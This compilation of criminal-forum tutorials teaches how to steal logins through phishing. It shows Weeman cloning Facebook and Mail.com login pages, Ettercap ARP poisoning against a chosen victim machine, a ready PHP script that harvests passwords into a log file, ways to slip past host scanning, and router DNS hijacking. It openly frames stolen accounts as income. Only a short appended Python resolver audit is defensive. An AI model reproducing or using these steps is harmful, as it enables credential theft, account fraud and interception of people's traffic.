Phishing site in 5 minutes

Carder

Today we will tell you about a simple but very useful tool that will help you get any phishing site up on your knees and in 5 minutes!

As a bonus, we will tell you how to do the same from your Android smartphone, as well as how to make a more powerful attack using Ettercap.

Attention! The information below is for educational purposes only and is not a call to action!

Weeman is a simple python HTTP server that generates phishing pages. It accepts user input and verifies registration information.

Let's get started
Let's look at dependencies first:

1. python 2.7;

2. pip2;

3. python-dev.

Installation

First you need to clone it to your PC:
Code:
git clone https://github.com/evait-security/weeman.git


Let's go to the weeman directory:

Code:
cd weeman

And run weeman.py:

Code:
sudo python2 weeman.py

After launch, we see the following picture.



So let's start building a phishing site.

First, let's select our site:

Code:
set url https://www.facebook.com

Let's choose a port:

Code:
set port 8080

And let's write where after that it will direct the user:

Code:
set action_url https://www.facebook.com

And launch:

Code:
run



Then if someone comes in and enters their data, we will see something like this:

Code:
email => 123456789@mail.com   
pass => 123456789

In order to plant this site on a victim, we can use an application like Ettercap or LanGhost to carry out a middleman attack.

Thanks to this, we will be able to intercept and analyze his traffic and even send our own traffic to his computer. In other words, due to the fact that he connected to our access point, we got full control over all incoming and outgoing data.

In addition, we will be able to intercept emails and passwords for other applications and networks. If desired, we can even implement meterpreter or another wiretap application into his system if we want to get more information.

Ettercap
Ettercap is an open source utility for analyzing the security of computer networks, the main purpose of which is MITM attacks (Man In The Middle attacks). It is capable of sniffing live connections, filtering content on the fly, and many other interesting features. It supports both active and passive protocol attacks and includes a large number of functions for network and host analysis.

More information can be found on the official Ettercap website.

Install / Configure Ettercap

You can download and install Ettercap from sources - here. Alternatively, you can use the following command:

Code:
apt-get install ettercap-gtk ettercap-common

Before proceeding, let's do a little setup. Open the file /etc/etter.conf:

Code:
nano /etc/etter.conf

Find these lines in it and uncomment them:

Code:
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i% iface -p tcp --dport% port -j REDIRECT --to-port% rport"
redir_command_off = "iptables -t nat -D PREROUTING -i% iface -p tcp --dport% port -j REDIRECT --to-port% rport"

After all the above operations are done, launch Ettercap. However, for some, including me, Ettercap will not work. Errors like "SEND L3 ERROR" will appear. To prevent such errors from appearing, use the following command:

Code:
# echo "1" & gt; / proc / sys / net / ipv4 / ip_forward
# cat / proc / sys / net / ipv4 / ip_forward

Now everything should work fine and errors shouldn't pop up.

Interception of passwords

First, look at the network architecture (see figure below) that will be used. This is necessary so that you understand well what is coming from and from where.

Launch Ettercap:

Code:
# ettercap -G

An application window will appear before us, as shown below.



Click on the Sniff -> Unified sniffing button. After that, we select the interface that is used. I have eth0.



In the top menu, click the Hosts - Scan for hosts buttons.



Now we click again Hosts - Hosts list. A window will appear as shown in the figure below.



Here we need to choose goals, i.e. choose a machine that will act as a "victim" and a gateway. As you can see from the architecture of the network that we use, the machine with the IP address = 192.168.1.3 acts as a “victim”. Well, as a gateway, the IP address = 192.168.1.1. Therefore, select 192.168.1.3 and click the Add to Target 1 button. Now click on 192.168.1.1 and click the Add to Target 2 button.

Next, click Mitm - ARP poisoning. After that, select Sniff remote connections.



Click OK. It remains only to run. To do this, click on the Start - Start sniffing button.

Sniffing is running. It remains to wait for the user to enter their data, for example, from an email account.

As soon as he entered his username / password and successfully entered his mailbox, the attacker also successfully intercepted his username and password:

Code:
HTTP: 94.100.184.17:443 -> USER: my_testing_akk PASS: my_secret_password INFO: http://mail.com/

Bonus
We will use the Termux console to run Weeman on your Android device. Many people call Termux the best linux emulator, agree. Download and open. For the convenience of using the terminal, I advise you to download the additional Hacker's Keyboard, later you will understand why.

We start preparing for the installation, enter two commands in the console sequentially:

Code:
$ apt update

$ apt install

This operation may take some time, depending on your internet speed.

Further:

Code:
$ apt install git

The question "Do yo want to contiune? [Y / n]" appears. Yes, we want to continue, we enter a small "y" (this means yes).

The following command:

Code:
$ apt install python2

The question "Do yo want to contiune? [Y / n]" will appear again. We do the same.

With this command we have installed python (programming language), in which weeman is written.

Done, we have installed everything weeman needs to run.

Download weeman:

Code:
$ git clone https://github.com/evait-security/weeman

Great, let's write the command:

Code:
$ ls

It displays the contents of directories.

If after this command nothing appears in the console, then try repeating the steps above.

If everything is ok, then let's continue:

Code:
$ cd weeman

$ ls

These files appeared. Launch weeman:

Code:
$ python2 weeman.py

We succeeded, the installation was successful and we launched weeman.

To display the help for the commands in the console, write:

Code:
$ help

Now we need to set some settings (for example, Mail.com). Let's enter the following commands:

Code:
$ set url https://mail.com

$ set port 8080

$ set action_url https://mail.com

With the first command, we set the URL of the site that we want to copy.

Install the port with the second command.

The third command determines the address to which the person who provided their data will be sent.

We register show, check the correctness of the settings:

Code:
$ show

That's right, we continue:

Code:
$ run

All is ready. The server is running, here is its address:

Copy "http : // localhost : 8080" and enter it into the browser, but on the phone (now this server is local and exists only on your device). Further, everything is by analogy with the desktop.

Thank you all for your attention!
 
Doing Phishing With Pens

In this guide, we will cover every step needed to create and host a phishing page of your choice, and it will be convenient for beginners, and those who have never hosted a phishing / scam page will be able to understand and create their own.

Before proceeding to # step 1, make sure that you have a code editor, and the simplest one we use is Notepad++. You can download it for FREE by following this link https://notepad-plus-plus.org/

So now that you've downloaded the code editor, let's get down to business, okay?

#1. DOWNLOAD THE HTML INDEX
To get started, you need to get the HTML index of the page you are going to start with.

There are various ways to do this, there are even online templates for popular sites, but they all cost a bit, and those of you who are broke will come to us complaining why there is something in our guide that requires upfront payment, although it is not always possible to make money without investing anything in advance, but we have several FREE options to get around this particular one.

So, first of all, we will use the easiest way to be as friendly as possible for beginners.

So, we're going to use Facebook throughout this guide, so before you ask, "Can I use Gmail, MS360, YouTube, Chase Bank, Bank of America, Amazon, BestBuy, Ebay, or PayPal" the answer is YES!

#2. PAGE SOURCE CODE
Now, depending on your browser, there may be different methods. Usually, you need to right-click the site and select "Check" or "Check Item". Then you click "(index)".

#3. SAVING THE SOURCE CODE
Select the source you see by pressing "Ctrl + A" and copy and paste everything you see in the field, open your Notepad ++ that you downloaded earlier to paste it all there.

Use Notepad ++ on Windows and a simple text editing program for those who don't use Windows. (Do not use other programs).

After the code is inserted into your Notepad ++, click "Save As" or any other option that allows you to save this document.

You will save this file on your "desktop" to make it easier to find and process it.

In the "File name" field, name the document "index.html", clearly without quotation marks.

Change the "File Type" to the following:

"Hypertext markup language (*html;*. Htm; *. Shtml; *. Shtm; *. Xhtml; *. Xht;*. Hta)".

Congratulations! You have completed the first step of the lesson!

So now you can go to your desktop and open the file you just saved index.html.

Side note: If the page looks bad, it just means that the site has all sorts of files that you will need to display correctly, but don't worry, we will help you.

Go to the "HTTRACK" page to download the free program. it will solve all your problems and provide you with a website that displays perfectly in the folder, you're done!

Website: https://www.httrack.com/

Download page: https://www.httrack.com/page/2/en/index.html

Assuming you have a sorted portion of the site, now it's time for some technical questions, don't worry, you have cashoutempire.com We are at your side to accompany you every step of the way!

#4. PHP FILE FOR BUILDING PASSWORDS
This PHP file, which you will create next, will serve as a tool for collecting the user's password. Again, there are several ways to create this PHP file if you have some programming knowledge, but if you're not worried, just copy our PHP example below to your notepad ++.

Code:
<?php
header (‘Location: facebook.com’);
$handle = fopen(“log.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n\n\n\n”);
fclose($handle);
exit;
?>

Obviously, in the second line, you will change the "location URL" to match the URL of the site you are phishing / spamming.

The file name should be "post.php".

The "Save As" file type should be as follows:

"PHP Hypertext Preprocessor file (* .php;*. Php3; *. Php4; *. Php5; *. Phps; *. Phpt;*. Phtml)»

#5. Enabling HTML with a PHP password file
Now it's time to change the HTML file to include your PHP file so that you can get the passwords that users enter.

So let's see how a website works when a user submits a username and password. For Facebook, all you have to do is press Ctrl-F and type "action=" in the field. Now you need to replace everything in the underlined part with "post.php", keeping the quotation marks. (please only have one set). Obviously, this method will be different for other sites. A good way to find it is to use the Inspect Elements tool in most modern browsers and click the login button. Find something similar to the method above.

#6. PHP FILE FOR STORING PASSWORDS
And now the most interesting thing is to make your site for phishing / spamming online, so that other people can view it.

You can use any decent hosting services to host and store passwords. In this tutorial, we will use HostGator.

Let's assume that you have already created a website on your hosting service.

For HostGator, just click "File Manager" and click "Upload Files".

You just need to upload it to the main folder of your root folder.

Then you will upload your "PHP Files" and "Change Permission".

Now you need to change the resolution to "777", which means almost every resolution.

#7. HOSTING A PHISHING / SPAM PAGE
For this step, you will need to find your own hosting provider that you will use, otherwise you will be banned.

There's a reason why we don't use HostGator as our hosting provider for our actual pages, and that's because most hosting providers use automatic scanning to detect phishing pages, which they then ban after checking.

Let's move forward by setting up a forum post.php.

You need to find the login form again in your index.html and replace "post.php" to "https: //yourwebsiteforyourpostphpupload/post.php", assuming that you uploaded to the root folder.
Placing the actual page Go to htmlpasta.com.

Then you need to copy the file index.html for your phishing site and paste it there.

Now click reCAPTCHA and click "Insert", you will get a link to your website.

CONGRATULATIONS!
You have completed hosting your first phishing / spam website!

Go to your site and try to enter fake login details, after you click the login button, it should redirect you to facebook.com.

Log in to your FTP server that hosts your file post.php, and there should be a new document named Log.txt, which is stored in the same folder as your file post.php, since all login data must be stored there.
I fucked you in the mouth..oh..
 
The network today has a lot of stores that sell accounts to various social networks and mailers, as well as access to various online games.

Many people make good money on this. When buying such accounts, they even get explanations that this account is fake or brutus. However, since people stopped using easy passwords, the option of selecting a password is not particularly relevant.

That is why an effective and profitable method of mining accounts on the Internet is fake, for which a phishing site is used.

Most often, fakes are made to get a username and password from email services, Vkontakte, Facebook, and also hunt for credit card numbers. Based on this, it is immediately clear how you can get your money here – user accounts obtained fraudulently can later be used to send spam, sell, and intercept various payment orders.

At a time when the average user was not particularly literate and it was easy to lure a fake to the site, access to accounts poured in a river from fake sites. Now it is more difficult to attract a fake to the site. And yet it is still relevant.

I still use fakes, but not for mass destruction, so to speak. My phishing method is still relevant and effective today. I do this by using DNS substitutions on routers, since access to routers is now very easy to get because of the huge number of exploits to them, as well as the low security of the routers themselves.

How it happens:

Probably, we all know about the hosts file, in which you can specify the domain address with the IP address to it, so that we can access the site through the address bar and get to the desired IP address, getting the necessary information. So the DNS is a kind of notebook that stores domain addresses with the location (IP address) of the site we want to access.(under this domain)

I enter the site address in the form of google. com. This request goes to the DNS server, where this large address book is located. The DNS server looks for the IP address of the site location with this domain and sends us to this site. This way we get exactly where we wanted to go. And we trust this site without a second thought, we trust the DNS server.

When accessing someone else's router, in the DNS server settings, I specify my own primary DNS (address book), and the real address responsible for this directory of domain names is already specified as the secondary DNS. The second one is specified as a backup and access to the second address book occurs if the first "DNS directory" does not find the address to which we want to access.

- Well, how to muddy your DNS server is a completely different story.

So, the primary DNS is my server, the secondary one is already real. And now I'm creating this very directory with an indication of where to go when searching for a Facebook or Google, mail, a banking site, or whatever. Yes, and I fill out this directory of addresses, indicating that the site is not located at its real IP address, but at the address where the fake is located. And the user, without suspecting anything, typing the name google in the address bar, will be sent not to the real location of the original site, but to my fake.

To avoid getting caught on fake sites, check your router settings and prohibit access to the admin panel from outside.

Postscript: Phishing technologies flourished in 2005-2010.

Currently, largely due to the higher level of literacy of the population, phishing is not so effective, but it is still quite often used.
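
Added example, not part of the original post: the router DNS substitution described above shows up on every client as an unfamiliar first resolver with the legitimate one kept as fallback, so a check that only confirms "a known resolver is present" misses it. The sketch below audits a resolver list in `resolv.conf` format against an allowlist, in the order the resolver tries them; the allowlist and all addresses are constructed (documentation ranges), and it is an assumption that the client exposes its DHCP-supplied resolvers in this format.

```python
import ipaddress

# Constructed samples: resolver lists as a client might receive them from the router.
EXPECTED = "nameserver 192.168.1.1\nnameserver 198.51.100.53\n"
TAMPERED = """\
# pushed by router over DHCP (constructed)
nameserver 203.0.113.66
nameserver 192.168.1.1   ; original resolver left as fallback
options timeout:2
"""
ALLOWED = ["192.168.1.1", "198.51.100.53"]  # assumption: resolvers this network should use


def parse_nameservers(resolv_text):
    """Return nameserver addresses in the order the resolver will try them."""
    servers = []
    for raw in resolv_text.splitlines():
        line = raw.split("#", 1)[0].split(";", 1)[0].strip()  # drop comments
        parts = line.split()
        if len(parts) >= 2 and parts[0] == "nameserver":
            servers.append(parts[1])
    return servers


def audit_resolvers(resolv_text, allowed):
    """Return [(position, address, verdict)] for every configured resolver."""
    nets = [ipaddress.ip_network(a, strict=False) for a in allowed]
    report = []
    for pos, addr in enumerate(parse_nameservers(resolv_text), start=1):
        try:
            ip = ipaddress.ip_address(addr.split("%", 1)[0])  # strip IPv6 zone id
        except ValueError:
            report.append((pos, addr, "unparseable"))
            continue
        verdict = "allowed" if any(ip in n for n in nets) else "UNEXPECTED"
        report.append((pos, addr, verdict))
    return report


def is_hijack_pattern(report):
    """True when an unexpected first resolver sits in front of an allowed one."""
    return (len(report) >= 2 and report[0][2] == "UNEXPECTED"
            and any(v == "allowed" for _, _, v in report[1:]))


if __name__ == "__main__":
    for name, text in (("expected", EXPECTED), ("tampered", TAMPERED)):
        rep = audit_resolvers(text, ALLOWED)
        print(name, rep, "hijack pattern:", is_hijack_pattern(rep))
```

An unexpected entry is a reason to inspect the router's DNS and remote-administration settings and update its firmware, as the post's closing advice suggests.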
 